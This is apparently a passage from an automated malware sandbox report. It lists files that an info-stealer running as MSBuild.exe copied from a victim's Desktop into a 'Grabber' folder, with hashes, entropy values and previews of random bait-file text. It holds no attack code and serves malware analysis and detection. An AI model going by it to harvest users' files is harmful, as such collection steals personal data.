Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL\SQSJKEBWDT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL\SUAVTZKNFL.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SQSJKEBWDT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SUAVTZKNFL.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SUAVTZKNFL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\IPKGELNTQY.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\MXPXCVPDVN.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	true
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\NEBFQQYWPS.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\SFPUSAFIOL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
